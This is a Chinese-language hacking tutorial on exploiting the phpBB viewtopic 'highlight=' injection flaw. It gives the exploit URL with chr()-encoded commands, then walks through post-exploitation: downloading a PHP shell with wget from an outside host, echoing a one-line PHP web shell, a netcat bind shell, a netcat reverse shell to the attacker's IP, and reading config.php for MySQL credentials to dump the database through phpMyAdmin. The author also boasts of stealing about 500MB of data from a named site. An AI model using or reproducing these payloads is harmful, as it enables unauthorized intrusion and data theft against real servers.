文章作者:作者:ik www.zuso.org 2. 漏洞名称:phpBB viewtopic highlight= 漏洞 3. 编写前言:虽然这个漏洞出了有一段时间, 但是到现在还是许多使用者没有更新.最近更是新出了phpBB2.x&PHP4.3.x unserialize函数内存泄露漏洞.但是很多朋友拿到了数据库密码和文件目录却不知道如何使用.颜颜也说没有看过针对phpbb run on unix like system 的应用文章, 我想刚好, 就把一些应用跟思路写了出来.两个漏洞不一样,但是思路我想还是可以借鉴的.呵, 废话不多说了, 漏洞是天天有新的,最主要的是你的思路. 4. 漏洞用法:http://www.xxxx.com/phpBB2/viewtopic.php?t=1&highlight=%2527%252esystem(CMD)%252e%2527CMD=指令 用 ascii code 编码, like chr(108)%252echr(115) 即为 ls 的意思!更多 ascii code 请参考 http://www.asciitable.com/ , 这边不多介绍啰 :p 5. 我的思路:一般发现论坛有问题之后, 我的之一步会是先检查他的权限, 以及我是否有足够权限写入! 用 'id' 会看到你现在的身分! 一般 apache 预设都是 nobody 或者 www !来寻找可以写入的地方吧 'ls -laR' 一般在 ~path/files/ 下面可以写入...试试看!嗯, 再来检查 wget 是否存在, 'ls -la /usr/local/bin' 看看有没有 wget...如果有, 我的下一步就是 'wget -O ~path/files/ik.php http://www.xfocus.net/tools/200405/PhpShell.php'(希望可以写入呀, X客中国那次就是这样玩的!) 成功的话直接在 ~path/files 目录下就可以执行 ik.php 了!但, 又有问题了, 如果在 bin 下面找不到 wget 怎办? 那就用 echo 吧! (总不会连 echo 最基本的都没吧=_+)丢一个最小的 php shell 吧! 'echo "<? system(\$_REQUEST['cmd']); ?>" > ~path/files/ik.php' ! 若能写入就成功了!用法就是 'http://www.xxx.com/phpBB2/ik.php?cmd=指令' ! 那... 如果都不能写入怎办!? 就此放弃吗? 想太多!试试看 nc 吧! 把他 bind 一个 port 出来 'nc -l -p 5555 -e /bin/sh' 然后我在 'telnet targetIP 5555' ! 成功的话就进去了!什么!? 他在 router (IP Share 后面怎办!?) 那就让他自己连回来吧, 先在我的 linux box 上面 'nc -l 6666' 开始监听!在目标上面再执行 'nc myIP 6666 -e /bin/sh', 如果成功的话, 我的这边就成功取得 shell 了!那... 如果以上 *** 都不行怎办!? 总不能就此放弃吧!? 因为是 php 使我不得不想到 phpmyAdmin 呀!来看看他的 config.php 档吧, 黑不掉首页 拿不到权限, 资料库总该借瞄一下吧!? 瞄不到, 密码也该借一下吧!?这个写着 MySQL 连线资讯的档案, 大家应该都会用猫 (cat) 去看! 但有的时候, cat 并不能使用, 该怎办呢? 找找其他指令吧, 我会用 more config.php 试试, 接着 tail -f config.php 等等! 基本上都可以用的! 若没有该指令就换下一个!得到这份密码, 令我想到更多事情可以玩, 我会先 'locate phpmyadmin' 'locate phpadmin' 找出有没有 phpmyadmin!如果有, 就连到 ~path/phpmyadmin 然后用那组帐号密码进去帮他备分一下阿, 做人要厚道, 黑他之前也要备份一下哩 :p就像那次我黑 X客中国 就是如此, 将近 500mb 的资料库从中国抓到美国= =